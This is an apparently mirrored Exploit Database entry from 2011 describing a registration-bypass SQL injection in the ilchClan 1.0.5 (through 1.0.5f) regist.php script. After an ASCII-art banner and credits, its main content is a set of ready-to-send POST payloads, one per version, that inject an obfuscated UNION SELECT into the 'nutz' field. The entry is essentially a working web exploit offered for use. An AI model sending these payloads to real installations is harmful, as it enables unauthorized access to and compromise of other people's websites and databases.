ilchClan 1.0.5 – ‘regist.php’ SQL Injection

• Exploit Database
• 83 阅读

• 作者： Easy Laster
  日期： 2011-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17101/

•  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  /_____ __ \ 
  \\_ \ | ___| |__/
  / / /\/ |/ __| '_ \ \
  \/\/ /_ | | (__| | | |/
  /\____/ |_|\___|_| |_|\
  \ Security Flaw in ilch clan 1.0.5 a,b,c,d,e,f! in regist.php/
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   by
   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  / \ 
  \ ___ ___ ___ ___ _ _ _____ _ _ /
  /| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_ \
  \|_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_|/
  /|_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_|\
  \|___| |___|/
  / \
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   SQL Injection Vulnerability in ilch clan 1.0.5 a,b,c,d,e,f! 
  Vulnerability Name : Registration Bypass SQL Injection Vulnerability 
   Date : 02.04.2011
   SQL Injection method : $_POST 
  Discovered by : Easy Laster
  Security Group :Team-Internet,Undergroundagents,websec-empire.to and 4004-Security-Project.com
   Greetings to free-hack.com
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  
  Security Flaws
   =-=-=-=-=-=-=-=-=-=-=-=
   ilch clan 1.0.5
  checked=Gelesen+und+einverstanden&nutz=1'+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaa
   ilch clan 1.0.5a
  checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaa
   ilch clan 1.0.5b
  checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaa
   ilch clan 1.0.5c
  checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaa
   ilch clan 1.0.5d
  checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaaa
   ilch clan 1.0.5e
  checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
   ilch clan 1.0.5f
  checked=Gelesen+und+einverstanden&nutz='+/**/UnIoN+/**/seLeCt/**/+1/**/--+&email=aaaaaaaaa
  

  Python

  Copy